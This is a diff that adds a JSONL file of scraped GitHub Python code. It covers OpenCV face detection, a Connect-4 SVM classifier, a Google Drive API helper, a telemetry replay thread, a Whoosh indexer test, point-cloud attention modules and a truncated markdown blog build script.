diff --git "a/5891.jsonl" "b/5891.jsonl" new file mode 100644--- /dev/null +++ "b/5891.jsonl" @@ -0,0 +1,2158 @@ +{"seq_id":"21304076875","text":"import cv2\nimport sys\n\ntry:\n imagePath = sys.argv[1]\n scaleFactor = float(sys.argv[2])\n # cascPath = sys.argv[2]\n # cascPath = \"/usr/local/Cellar/opencv/3.4.3/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml\"\n cascPath = \"haarcascade_frontalface_default.xml\"\n\n # Create the haar cascade\n faceCascade = cv2.CascadeClassifier(cascPath)\n\n # Read the image\n image = cv2.imread(imagePath)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n\n # Detect faces in the image\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor = scaleFactor,\n minNeighbors = 5,\n minSize = (30, 30),\n flags = 0\n )\n\n print(\"Found {0} faces!\".format(len(faces)))\n\n # Draw a rectangle around the faces\n for (x, y, w, h) in faces:\n cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n\n cv2.imshow(\"Faces found\", image)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n \nexcept Exception as e:\n print('Los parámetros que deben enviarse son: \\n(1) el path de la imagen \\n(2) el factor de escala (float).')\n print('Detalle del error: ', e)\n\n\n","repo_name":"paolodoors/face_recognition_ocv","sub_path":"face_detect.py","file_name":"face_detect.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6820939164","text":"import sklearn, nltk\nfrom sklearn import svm\nfrom sklearn.metrics import accuracy_score\nimport numpy as np\nimport sys\nimport copy\nfp=open('connect-4.data', 'r')\ndata=fp.read().strip().split()\nfp.close()\n\n#Vectorize data.\nGame=[]\nOutcome=[]\nfor x in data:\n\ty = x.split(',')\n\tif y[-1] == 'win':\n\t\tOutcome.append(1)\n\telif y[-1] == 'loss':\n\t\tOutcome.append(-1)\n\telif y[-1] == 'draw':\n\t\tOutcome.append(0)\n\ty = y[:-1]\n\ttemp=[]\n\tfor stuff in y:\n\t\tif stuff == 'x':\n\t\t\ttemp.append(1)\n\t\telif stuff == 'b':\n\t\t\ttemp.append(0)\n\t\telif stuff == 'o':\n\t\t\ttemp.append(-1)\n\tGame.append(temp)\n\n#Vectorization of data complete! Game contains feature vectors and Outcome contains the outcomes\nVGame=[[],[],[],[],[],[]]\nVOutcome=[[],[],[],[],[],[]]\nl = len(Game)\nvl=int(l/5)+1\nfor i in range(l):\n\tt=int(i/vl)\n\tx=Game[i]\n\ty=Outcome[i]\n\tVGame[t].append(x)\n\tVOutcome[t].append(y)\n\nclfw = svm.LinearSVC(loss='hinge')\nclfd = svm.LinearSVC(loss='hinge')\nclfl = svm.LinearSVC(loss='hinge')\n\n#create learning sets for 3 classifiers\nfor vpart in range(5):\n\t# print(\"Validating part \"+str(vpart))\n\t#win classifier\n\tgw=[]\n\tow=[]\n\t#draw classifier\n\tgd=[]\n\tod=[]\n\t#loss classifier\n\tgl=[]\n\tol=[]\n\n\t#Extract Test data\n\tPred=[]\n\tOTest=copy.deepcopy(VOutcome[vpart])\n\tGTest=copy.deepcopy(VGame[vpart])\n\t#Create Training sets for 3 classifiers!\n\tfor z in range(5):\n\t\t# print(\"z = \"+str(z))\n\t\tif z == vpart:\n\t\t\tcontinue\n\t\telse:\n\t\t\t# print(len(VGame[z]))\n\t\t\tO=copy.deepcopy(VOutcome[z])\n\t\t\tG=copy.deepcopy(VGame[z])\n\t\t\t# print(str(len(VGame[z]))+\" \"+str(len(G)))\n\t\t\tfor i in range(len(O)):\n\t\t\t\tif O[i] == 1:\n\t\t\t\t\tgw.append(G[i])\n\t\t\t\t\tgd.append(G[i])\n\t\t\t\t\tgl.append(G[i])\n\t\t\t\t\tow.append(1)\n\t\t\t\t\tod.append(0)\n\t\t\t\t\tol.append(0)\n\t\t\t\tif O[i] == 0:\n\t\t\t\t\tgw.append(G[i])\n\t\t\t\t\tgd.append(G[i])\n\t\t\t\t\tgl.append(G[i])\n\t\t\t\t\tow.append(0)\n\t\t\t\t\tod.append(1)\n\t\t\t\t\tol.append(0)\n\t\t\t\tif O[i] == -1:\n\t\t\t\t\tgw.append(G[i])\n\t\t\t\t\tgd.append(G[i])\n\t\t\t\t\tgl.append(G[i])\n\t\t\t\t\tow.append(0)\n\t\t\t\t\tod.append(0)\n\t\t\t\t\tol.append(1)\n\tclfw.fit(gw,ow)\n\tclfd.fit(gd,od)\n\tclfl.fit(gl,ol)\n\tPred1 = clfw.decision_function(GTest)\n\tPred2 = clfl.decision_function(GTest)\n\tPred3 = clfd.decision_function(GTest)\n\ttemparr.append(Pred1)\n\tfor x in range(len(Pred1)):\n\t\ttemparr=[]\n\t\ttemparr.append(Pred1[x])\n\t\ttemparr.append(Pred2[x])\n\t\ttemparr.append(Pred3[x])\n\t\t# print(temparr)\n\t\tmaxarg = np.argmax(temparr)\n\t\tif maxarg==0:\n\t\t\tPred.append(1)\n\t\tif maxarg==1:\n\t\t\tPred.append(0)\n\t\tif maxarg==2:\n\t\t\tPred.append(-1)\n\n\taccuracy = accuracy_score(OTest, Pred)\n\tprint(accuracy)\n","repo_name":"divush/MLT-Assignments","sub_path":"A2/Q2/restconnect.py","file_name":"restconnect.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35498598931","text":"from __future__ import print_function\nimport pickle, io, random, string\nimport os.path\nfrom googleapiclient.discovery import build\nfrom googleapiclient.http import MediaIoBaseDownload, MediaFileUpload\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\n\nclass drive:\n def setService(self):\n # change to the subfolder where the credentials (should be) are\n dir = os.getcwd()\n os.chdir(dir + '\\myDrive')\n\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n # get credentials.json\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', self.SCOPES)\n creds = flow.run_local_server(port=0)\n\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n # change back directories\n os.chdir(dir)\n \n return build('drive', 'v3', credentials=creds)\n\n def printLastFiles(self, num=10):\n # Call the Drive v3 API\n results = self.service.files().list(\n pageSize=num, fields=\"nextPageToken, files(id, name)\").execute()\n items = results.get('files', [])\n\n if not items:\n print('No files found.')\n else:\n print('Files:')\n for item in items:\n print(u'{0} ({1})'.format(item['name'], item['id']))\n\n def getFileIdByName(self, fileName):\n query = \"name='\" + fileName + \"'\"\n page_token = None\n while True:\n response = self.service.files().list(q=query,\n spaces='drive',\n fields='nextPageToken, files(id, name)',\n pageToken=page_token).execute()\n for file in response.get('files', []):\n # Process change\n return file.get('id')\n page_token = response.get('nextPageToken', None)\n if page_token is None:\n break\n\n def downloadFileById(self, id, path):\n file_id = str(id)\n request = self.service.files().get_media(fileId=file_id)\n fh = io.FileIO(path + self.randomStringName(6) + self.downloadExtension, 'wb')\n downloader = MediaIoBaseDownload(fh, request)\n done = False\n while done is False:\n status, done = downloader.next_chunk()\n print (\"Download %d%%.\" % int(status.progress() * 100))\n\n # find id of the buffer folder and get the ids of the files inside\n def getFolderIdByName(self, folderName):\n # get the folder id by folder name\n folderQuery = \"mimeType = 'application/vnd.google-apps.folder' and \" +\"name='\" + folderName + \"'\"\n response = self.service.files().list(q=folderQuery,\n spaces='drive',\n fields='nextPageToken, files(id, name)').execute()\n folder = response.get('files', [])[0]\n if not folder:\n print('No folders with name ' + folderName + ' found.')\n else:\n folderID = folder.get('id')\n print('Folder ID: ' + folderID)\n return folderID\n \n def getIdFilesFromFolder(self, folderID):\n # once you have the folder id, get the ids of all the files inside\n folderContentQuery = \"mimeType='image/jpeg' and '\" + folderID +\"' in parents\"\n page_token = None\n id_array = []\n while True:\n response = self.service.files().list(q=folderContentQuery,\n spaces='drive',\n fields='nextPageToken, files(id, name)',\n pageToken=page_token).execute()\n for file in response.get('files', []):\n print ('Found file: %s (%s)' % (file.get('name'), file.get('id')))\n id_array.append(file.get('id'))\n page_token = response.get('nextPageToken', None)\n if page_token is None:\n break\n return id_array\n\n def randomStringName(self, N):\n return ''.join(random.choices(string.ascii_lowercase + string.digits, k=N))\n\n def uploadFile(self, fileToUpload, folderID):\n fileBaseName = os.path.basename(fileToUpload)\n mime = 'image/png'\n if(os.path.splitext(fileBaseName)[1] == '.mp4'):\n mime = 'video/mp4'\n \n file_metadata = {'name': fileBaseName,\n 'parents' : [folderID]}\n media = MediaFileUpload(fileToUpload, mimetype=mime)\n file = self.service.files().create(body=file_metadata,\n media_body=media,\n fields='id').execute()\n print ('Uploaded file ID: %s' % file.get('id'))\n\n def deleteFileById(self, file_id):\n try:\n self.service.files().delete(fileId=file_id).execute()\n except:\n print(\"Could not delete file\")\n \n def __init__(self):\n # If modifying these scopes, delete the file token.pickle.\n self.SCOPES = ['https://www.googleapis.com/auth/drive']\n self.downloadExtension = \".jpg\"\n self.service = self.setService()\n","repo_name":"angelolmg/python-auto-painter","sub_path":"myDrive/gdriveservice.py","file_name":"gdriveservice.py","file_ext":"py","file_size_in_byte":5924,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"10032718542","text":"import threading\nimport time\n\nEVENT_TYPES = [\"accelx\",\"accely\",\"accelz\",\"gyrox\",\"gyroy\",\"gyroz\",\"gps\",\"altitude\",\"temp\",\"battery\"]\n\ndef timeMs():\n\treturn int(time.time()*1000)\n\nclass ReplayThread(threading.Thread):\n\tdef __init__(self, teleManager, looped):\n\t\tsuper(ReplayThread, self).__init__(daemon=True)\n\t\tself.looped = looped;\n\t\tself.telemetry = teleManager\n\n\tdef newMessages(self,mint,maxt):\n\t\tevents = []\n\t\tfor val in EVENT_TYPES:\n\t\t\tevents += self.telemetry.serviceRequest(val,mint,maxt)\n\t\treturn events\n\n\tdef doReplay(self, startTime):\n\t\tlastTime = -float(\"inf\")\n\t\tendTime = self.telemetry.maxTime()\n\t\twhile True:\n\t\t\ttime.sleep(0.01) # Run every ~10 ms\n\t\t\tnewTime = timeMs()-startTime\n\t\t\tself.telemetry.updateHistoryMask(None,newTime);\n\t\t\tnewData = self.newMessages(lastTime+1,startTime)\n\t\t\t# print(\"{:d} new data points for time {:d}\".format(len(newData),newTime))\n\t\t\tself.telemetry.socket.emit(\"telemetry\",[e.data for e in newData])\n\t\t\tlastTime = newTime\n\t\t\tif newTime > endTime:\n\t\t\t\tbreak\n\n\tdef run(self):\n\t\tself.telemetry.updateHistoryMask(None,-float('inf'));\n\t\twhile True:\n\t\t\ttime.sleep(5)\n\t\t\tself.doReplay(timeMs())\n\t\t\tif not self.looped:\n\t\t\t\tbreak","repo_name":"rensselaer-rocket-society/TelemetryUnit","sub_path":"Ground Station/LiveReplay.py","file_name":"LiveReplay.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33863850791","text":"\"\"\"Tests for yahoo_dataset_indexer.\"\"\"\n\nimport yahoo_dataset_indexer\nimport unittest\nfrom Whoosh import loadIndex, loadCollector, loadQueryParser\nfrom whoosh.fields import Schema, TEXT\nimport os\nfrom whoosh.analysis import StemmingAnalyzer\n\n\nclass YahooDatasetIndexerTest(unittest.TestCase):\n\n def test_create_index(self):\n stem_analyzer = StemmingAnalyzer()\n test_folder_to_index = 'test-folder'\n test_index_name = 'test-index'\n if not os.path.exists(test_folder_to_index):\n os.mkdir(test_folder_to_index)\n\n # Index 1 question.\n ofile = open(test_folder_to_index + '/question_indexer_test.xml', 'w')\n ofile.write(\n '432470 Why are yawns contagious?\\\n When people yawn, you see that other people in the room yawn, too. Why is that?\\\n When your body ')\n ofile.close()\n\n yahoo_dataset_indexer.IndexYahooQuestionsWithWhoosh(test_folder_to_index,\n test_index_name)\n questions_index, questions_searcher = loadIndex(test_index_name,\n test_index_name)\n # Check the schema.\n expected_schema = Schema(question_tokens=TEXT(analyzer=stem_analyzer,\n stored=False,\n phrase=False),\n question_text=TEXT(analyzer=stem_analyzer,\n stored=True,\n phrase=False),\n answers=TEXT(analyzer=stem_analyzer,\n stored=False,\n phrase=False))\n self.assertEqual(expected_schema, questions_index.schema)\n # Check the number of documents.\n self.assertEqual(1, questions_index.doc_count())\n # Check the number of terms in question and answer fields.\n expected_question_terms = ['contagi', 'yawn']\n i = 0\n for question_terms_tuple in questions_index.reader().iter_field('question_tokens'):\n self.assertEqual(question_terms_tuple[0], expected_question_terms[i])\n i += 1\n expected_answer_terms = ['bodi']\n i = 0\n for answer_terms_tuple in questions_index.reader().iter_field('answers'):\n self.assertEqual(answer_terms_tuple[0], expected_answer_terms[i])\n i += 1\n\n def test_search_index(self):\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"vmanisha/QueryExpansion","sub_path":"questions/yahoo_dataset_indexer_test.py","file_name":"yahoo_dataset_indexer_test.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"27628118830","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\nfrom modules.linear_attention import LinearAttention\r\n\r\nclass Self_Attention(nn.Module):\r\n def __init__(self,\r\n d_model,\r\n nhead,\r\n attention='linear'):\r\n super(Self_Attention, self).__init__()\r\n\r\n self.dim = d_model // nhead\r\n self.nhead = nhead\r\n\r\n # position encoding\r\n self.pos_mlp = nn.Sequential(\r\n nn.Linear(3, d_model),\r\n nn.ReLU(),\r\n nn.Linear(d_model, d_model)\r\n )\r\n\r\n # multi-head attention\r\n self.q_proj = nn.Linear(d_model, d_model, bias=False)\r\n self.k_proj = nn.Linear(d_model, d_model, bias=False)\r\n self.v_proj = nn.Linear(d_model, d_model, bias=False)\r\n self.attention = LinearAttention()\r\n self.merge = nn.Linear(d_model, d_model, bias=False)\r\n\r\n # feed-forward network\r\n self.mlp = nn.Sequential(\r\n nn.Linear(d_model*2, d_model*2, bias=False),\r\n nn.ReLU(True),\r\n nn.Linear(d_model*2, d_model, bias=False),\r\n )\r\n\r\n # norm and dropout\r\n self.norm1 = nn.LayerNorm(d_model)\r\n self.norm2 = nn.LayerNorm(d_model)\r\n\r\n def forward(self, feat, xyz, mask=None):\r\n \"\"\"\r\n Args:\r\n feat (torch.Tensor): [B, C, N]\r\n xyz (torch.Tensor): [B, N, 3]\r\n mask (torch.Tensor): [B, N] (optional)\r\n \"\"\"\r\n bs = feat.size(0)\r\n feat = feat.permute(0, 2, 1)\r\n feat_pos = feat + self.pos_mlp(xyz)\r\n\r\n # multi-head attention\r\n query = self.q_proj(feat_pos).view(bs, -1, self.nhead, self.dim) # [B, N, (H, D)]\r\n key = self.k_proj(feat_pos).view(bs, -1, self.nhead, self.dim) # [B, N, (H, D)]\r\n value = self.v_proj(feat_pos).view(bs, -1, self.nhead, self.dim) # [B, N, (H, D)]\r\n\r\n message = self.attention(query, key, value, q_mask=mask, kv_mask=mask) # [B, N, (H, D)]\r\n message = self.merge(message.view(bs, -1, self.nhead*self.dim)) # [B, N, C=H*D]\r\n message = self.norm1(message) # [B, N, C=H*D]\r\n\r\n # feed-forward network\r\n message = self.mlp(torch.cat([feat, message], dim=2)) # [B, N, C=H*D]\r\n message = self.norm2(message) # [B, N, C=H*D]\r\n\r\n return (feat + message).permute(0, 2, 1) # [B, C, N]\r\n\r\ndef farthest_point_sample(xyz, npoint):\r\n \"\"\"\r\n Input:\r\n xyz: pointcloud data, [B, N, 3]\r\n npoint: number of samples\r\n Return:\r\n centroids: sampled pointcloud index, [B, npoint]\r\n \"\"\"\r\n device = xyz.device\r\n B, N, C = xyz.shape\r\n centroids = torch.zeros(B, npoint, dtype=torch.long).to(device)\r\n distance = torch.ones(B, N).to(device) * 1e10\r\n farthest = torch.randint(0, N, (B,), dtype=torch.long).to(device)\r\n batch_indices = torch.arange(B, dtype=torch.long).to(device)\r\n for i in range(npoint):\r\n centroids[:, i] = farthest\r\n centroid = xyz[batch_indices, farthest, :].view(B, 1, 3)\r\n dist = torch.sum((xyz - centroid) ** 2, -1)\r\n mask = dist < distance\r\n distance[mask] = dist[mask]\r\n farthest = torch.max(distance, -1)[1]\r\n return centroids\r\n\r\ndef random_point_sample(xyz, npoint):\r\n \"\"\"\r\n Input:\r\n xyz: pointcloud data, [B, N, 3]\r\n npoint: number of samples\r\n Return:\r\n centroids: random sampled pointcloud index, [B, npoint]\r\n \"\"\"\r\n device = xyz.device\r\n centroids = torch.arange(npoint, dtype=torch.long).to(device).repeat(xyz.size(0), 1)\r\n return centroids\r\n\r\ndef index_points(points, idx):\r\n \"\"\"\r\n\r\n Input:\r\n points: input points data, [B, N, C]\r\n idx: sample index data, [B, S]\r\n Return:\r\n new_points:, indexed points data, [B, S, C]\r\n \"\"\"\r\n device = points.device\r\n B = points.shape[0]\r\n view_shape = list(idx.shape)\r\n view_shape[1:] = [1] * (len(view_shape) - 1)\r\n repeat_shape = list(idx.shape)\r\n repeat_shape[0] = 1\r\n batch_indices = torch.arange(B, dtype=torch.long).to(device).view(view_shape).repeat(repeat_shape)\r\n new_points = points[batch_indices, idx, :]\r\n return new_points\r\n\r\ndef square_distance(src, dst):\r\n \"\"\"\r\n Calculate Euclid distance between each two points.\r\n\r\n src^T * dst = xn * xm + yn * ym + zn * zm;\r\n sum(src^2, dim=-1) = xn*xn + yn*yn + zn*zn;\r\n sum(dst^2, dim=-1) = xm*xm + ym*ym + zm*zm;\r\n dist = (xn - xm)^2 + (yn - ym)^2 + (zn - zm)^2\r\n = sum(src**2,dim=-1)+sum(dst**2,dim=-1)-2*src^T*dst\r\n\r\n Input:\r\n src: source points, [B, N, C]\r\n dst: target points, [B, M, C]\r\n Output:\r\n dist: per-point square distance, [B, N, M]\r\n \"\"\"\r\n B, N, _ = src.shape\r\n _, M, _ = dst.shape\r\n dist = -2 * torch.matmul(src, dst.permute(0, 2, 1))\r\n dist += torch.sum(src ** 2, -1).view(B, N, 1)\r\n dist += torch.sum(dst ** 2, -1).view(B, 1, M)\r\n return dist\r\n\r\ndef topk(input, k, dim=None, largest=True, sorted=True):\r\n if dim is None:\r\n dim = -1\r\n if dim < 0:\r\n dim += input.ndim\r\n \r\n transpose_dims = [i for i in range(input.ndim)]\r\n transpose_dims[0] = dim\r\n transpose_dims[dim] = 0\r\n input = input.permute(transpose_dims)\r\n index = torch.argsort(input, dim=0, descending=largest)\r\n indices = index[:k]\r\n indices = indices.permute(transpose_dims)\r\n return [None, indices]\r\n\r\ndef knn_point(nsample, xyz, new_xyz):\r\n \"\"\"\r\n Input:\r\n nsample: max sample number in local region\r\n xyz: all points, [B, N, C]\r\n new_xyz: query points, [B, S, C]\r\n Return:\r\n group_idx: grouped points index, [B, S, nsample]\r\n \"\"\"\r\n sqrdists = square_distance(new_xyz, xyz)\r\n _, group_idx = topk(sqrdists, nsample, dim = -1, largest=False, sorted=False)\r\n return group_idx\r\n\r\ndef query_ball_point(radius, nsample, xyz, new_xyz):\r\n \"\"\"\r\n Input:\r\n radius: local region radius\r\n nsample: max sample number in local region\r\n xyz: all points, [B, N, 3]\r\n new_xyz: query points, [B, S, 3]\r\n Return:\r\n group_idx: grouped points index, [B, S, nsample]\r\n \"\"\"\r\n device = xyz.device\r\n B, N, C = xyz.shape\r\n _, S, _ = new_xyz.shape\r\n\r\n group_idx = torch.arange(N, dtype=torch.long).to(device).view(1, 1, N).repeat(B, S, 1)\r\n\r\n sqrdists = square_distance(new_xyz, xyz)\r\n group_idx[sqrdists > radius ** 2] = N\r\n group_idx = group_idx.sort(dim=-1)[0][:, :, :nsample]\r\n group_first = group_idx[:, :, 0].view(B, S, 1).repeat([1, 1, nsample])\r\n mask = group_idx == N\r\n group_idx[mask] = group_first[mask]\r\n return group_idx\r\n\r\ndef sample_and_group_edge(npoint, radius, nsample, xyz, points, sampling, numpoints, returnfps=False, use_knn=False):\r\n \"\"\"\r\n Input:\r\n npoint:\r\n radius:\r\n nsample:\r\n xyz: input points position data, [B, N, 3]\r\n points: input points data, [B, N, D]\r\n Return:\r\n new_xyz: sampled points position data, [B, npoint, nsample, 3]\r\n new_points: sampled points data, [B, npoint, nsample, 3+D]\r\n \"\"\"\r\n B, N, C = xyz.shape\r\n S = numpoints\r\n\r\n if sampling == \"FPS\":\r\n fps_idx = farthest_point_sample(xyz, numpoints) # [B, numpoints]\r\n elif sampling == \"RANDOM\":\r\n fps_idx = random_point_sample(xyz, numpoints) # [B, numpoints]\r\n\r\n new_xyz = index_points(xyz, fps_idx) # B x S x 3\r\n \r\n if use_knn:\r\n idx = knn_point(nsample, xyz, new_xyz)\r\n else:\r\n idx = query_ball_point(radius, nsample, xyz, new_xyz) # B x S x K\r\n\r\n grouped_xyz = index_points(xyz, idx) # B x S x k x 3\r\n grouped_xyz_norm = grouped_xyz - new_xyz.view(B, S, 1, C) # B x S x k x 3\r\n\r\n if points is not None:\r\n # points: B x N x D\r\n # fps_idx: B x S\r\n # center_points: B x S x D\r\n center_points = index_points(points, fps_idx) # B x S x D\r\n grouped_points = index_points(points, idx)\r\n\r\n new_points = torch.cat([grouped_xyz_norm, \r\n center_points.unsqueeze(2).repeat([1, 1, nsample, 1]),\r\n grouped_points-center_points.unsqueeze(2)],\r\n dim=-1)\r\n else:\r\n new_points = grouped_xyz_norm\r\n if returnfps:\r\n return new_xyz, new_points, grouped_xyz, fps_idx\r\n else:\r\n return new_xyz, new_points\r\n\r\ndef sample_and_group_all(xyz, points):\r\n \"\"\"\r\n Input:\r\n xyz: input points position data, [B, N, 3]\r\n points: input points data, [B, N, D]\r\n Return:\r\n new_xyz: sampled points position data, [B, 1, 3]\r\n new_points: sampled points data, [B, 1, N, 3+D]\r\n \"\"\"\r\n device = xyz.device\r\n B, N, C = xyz.shape\r\n new_xyz = torch.zeros(B, 1, C).to(device)\r\n grouped_xyz = xyz.view(B, 1, N, C)\r\n if points is not None:\r\n new_points = torch.cat([grouped_xyz, points.view(B, 1, N, -1)], dim=-1)\r\n else:\r\n new_points = grouped_xyz\r\n return new_xyz, new_points\r\n\r\nclass PointNetSetAbstractionEdgeSA(nn.Module):\r\n def __init__(self, npoint, radius, nsample, mlp, sampling, use_xyz=True, group_all=False, use_knn=False):\r\n super(PointNetSetAbstractionEdgeSA, self).__init__()\r\n self.npoint = npoint\r\n self.radius = radius\r\n self.nsample = nsample\r\n self.use_xyz = use_xyz\r\n self.sampling = sampling\r\n self.use_knn = use_knn\r\n\r\n self.mlp_convs = nn.ModuleList()\r\n self.mlp_bns = nn.ModuleList()\r\n\r\n if self.use_xyz:\r\n mlp[0] += 3\r\n\r\n last_channel = mlp[0]\r\n for out_channel in mlp[1:]:\r\n self.mlp_convs.append(nn.Conv2d(last_channel, out_channel, 1))\r\n self.mlp_bns.append(nn.BatchNorm2d(out_channel))\r\n last_channel = out_channel\r\n self.group_all = group_all\r\n self.self_attention = Self_Attention(last_channel, 2, 'linear')\r\n\r\n def forward(self, xyz, points, numpoints):\r\n \"\"\"\r\n Input:\r\n xyz: input points position data, [B, N, 3]\r\n points: input points data, [B, D, N]\r\n Return:\r\n new_xyz: sampled points position data, [B, S, 3]\r\n new_points_concat: sample points feature data, [B, D', S]\r\n \"\"\"\r\n # xyz = xyz.permute(0, 2, 1) # le\r\n if points is not None:\r\n points = points.permute(0, 2, 1) # BxNxD\r\n\r\n if self.group_all:\r\n new_xyz, new_points = sample_and_group_all(xyz, points)\r\n else:\r\n new_xyz, new_points = sample_and_group_edge(self.npoint, self.radius, self.nsample, xyz, points, self.sampling, numpoints, False, self.use_knn)\r\n\r\n new_points = new_points.permute(0, 3, 1, 2) # [B, D, numpoints, nsample]\r\n \r\n for i, conv in enumerate(self.mlp_convs):\r\n bn = self.mlp_bns[i]\r\n new_points = F.relu(bn(conv(new_points)))\r\n\r\n new_points = torch.max(new_points, 3)[0] # B x D x numpoints\r\n\r\n new_points = self.self_attention(new_points, new_xyz)\r\n return new_xyz, new_points\r\n\r\nclass FP_SA(nn.Module):\r\n def __init__(self,\r\n last_channel,\r\n feat1_dim, # B x C1 x N\r\n feat2_dim, # B x C2 x S\r\n d_model,\r\n out_dim,\r\n nhead,\r\n attention='linear'):\r\n super(FP_SA, self).__init__()\r\n\r\n self.dim = d_model // nhead\r\n self.nhead = nhead\r\n\r\n # position encoding\r\n # self.pos_mlp1 = nn.Sequential(\r\n # nn.Linear(3, d_model),\r\n # nn.ReLU(),\r\n # nn.Linear(d_model, feat1_dim)\r\n # )\r\n\r\n self.pos_mlp2 = nn.Sequential(\r\n nn.Linear(3, d_model),\r\n nn.ReLU(),\r\n nn.Linear(d_model, feat2_dim)\r\n )\r\n\r\n # multi-head attention\r\n self.q_proj = nn.Linear(feat1_dim, d_model, bias=False) # feat1\r\n self.k_proj = nn.Linear(feat2_dim, d_model, bias=False) # feat2\r\n self.v_proj = nn.Linear(feat2_dim, d_model, bias=False) # feat2\r\n self.attention = LinearAttention()\r\n self.merge = nn.Linear(d_model, d_model, bias=False)\r\n\r\n # feed-forward network\r\n self.mlp = nn.Sequential(\r\n nn.Linear(feat1_dim+d_model, d_model*2, bias=False),\r\n nn.ReLU(True),\r\n nn.Linear(d_model*2, out_dim, bias=False),\r\n )\r\n\r\n # norm and dropout\r\n self.norm1 = nn.LayerNorm(d_model)\r\n self.norm2 = nn.LayerNorm(out_dim)\r\n\r\n def forward(self, feat1, xyz1, feat2, xyz2, mask=None):\r\n \"\"\"\r\n Args:\r\n feat1 (torch.Tensor): [B, C1, N]\r\n xyz1 (torch.Tensor): [B, N, 3]\r\n feat2 (torch.Tensor): [B, C2, S]\r\n xyz2 (torch.Tensor): [B, S, 3]\r\n mask (torch.Tensor): [B, N] (optional)\r\n \"\"\"\r\n bs = feat1.size(0)\r\n\r\n feat1 = feat1.permute(0, 2, 1) # [B, N, C1]\r\n feat2 = feat2.permute(0, 2, 1) # [B, S, C2]\r\n\r\n # feat1 = feat1 + self.pos_mlp1(xyz1)\r\n feat2_pos = feat2 + self.pos_mlp2(xyz2)\r\n\r\n # multi-head attention\r\n query = self.q_proj(feat1).view(bs, -1, self.nhead, self.dim) # [B, N, (H, D)]\r\n key = self.k_proj(feat2).view(bs, -1, self.nhead, self.dim) # [B, N, (H, D)]\r\n value = self.v_proj(feat2_pos).view(bs, -1, self.nhead, self.dim) # [B, N, (H, D)]\r\n\r\n message = self.attention(query, key, value, q_mask=None, kv_mask=None) # [B, N, (H, D)]\r\n message = self.merge(message.view(bs, -1, self.nhead*self.dim)) # [B, N, C=H*D]\r\n message = self.norm1(message) # [B, N, C=H*D]\r\n\r\n # feed-forward network\r\n message = self.mlp(torch.cat([feat1, message], dim=2)) # [B, N, C=H*D]\r\n message = self.norm2(message)\r\n\r\n return message.permute(0, 2, 1) # [B, C, N]\r\n\r\nclass PointNetFeaturePropagationSA(nn.Module):\r\n def __init__(self, mlp, mlp_inte):\r\n super(PointNetFeaturePropagationSA, self).__init__()\r\n self.mlp_convs = nn.ModuleList()\r\n self.mlp_bns = nn.ModuleList()\r\n \r\n last_channel = mlp[0]\r\n for out_channel in mlp[1:]:\r\n self.mlp_convs.append(nn.Conv1d(last_channel, out_channel, 1))\r\n self.mlp_bns.append(nn.BatchNorm1d(out_channel))\r\n last_channel = out_channel\r\n\r\n self.interpolation = FP_SA(\r\n last_channel=mlp_inte[0],\r\n feat1_dim=mlp_inte[1],\r\n feat2_dim=mlp_inte[2],\r\n d_model=mlp_inte[3],\r\n out_dim=mlp_inte[4],\r\n nhead=2,\r\n attention='linear')\r\n\r\n def forward(self, xyz1, xyz2, points1, points2):\r\n \"\"\"\r\n Input:\r\n xyz1: input points position data, [B, N, C]\r\n xyz2: sampled input points position data, [B, S, C]\r\n points1: input points data, [B, D, N]\r\n points2: input points data, [B, D, S]\r\n Return:\r\n new_points: upsampled points data, [B, D', N]\r\n \"\"\"\r\n B, N, C = xyz1.shape\r\n \r\n inte_points1 = self.interpolation(points1, xyz1, points2, xyz2) # [B, C2, N]\r\n return inte_points1","repo_name":"fpthink/STNet","sub_path":"modules/pointnet2_utils.py","file_name":"pointnet2_utils.py","file_ext":"py","file_size_in_byte":15749,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"21"} +{"seq_id":"10958751042","text":"from distutils.dir_util import copy_tree\n\nimport markdown2\nimport argparse\nimport datetime\nimport shutil\nimport json\nimport os\n\n'''\nExpects the working directory to be setup like the following...\n\n WorkingDirectory:\n EvanMPutnam.github.io - Build files (Git repo)\n WebsiteSRC - Src files (Git repo)\n\n1. Converts the input markdown file to html and adds an entry to the json object.\n2. Moves any new images in the images folder over to the src folder.\n3. Rebuilds the application with the new images and json file.\n4. Pushes off to github with a commit message detailing article name.\n'''\n\nBUILD_DIR = \"../EvanMPutnam.github.io\"\nBASE_DIR = os.getcwd()\n\n# ###########################################################\n# Description: Converts a markdown file to html and\n# returns it as a string.\n# ###########################################################\ndef convert_file_to_html(file_path):\n str_to_read = \"\"\n with open(file_path) as fle:\n str_to_read = fle.read()\n str_to_write = markdown2.markdown(str_to_read, extras = [\"fenced-code-blocks\"])\n print(str_to_write)\n return str_to_write\n\n# ###########################################################\n# Description: Manipulates the .json file that acts\n# as the database.\n# ###########################################################\ndef alter_json_file(json_file_path, title, summary, 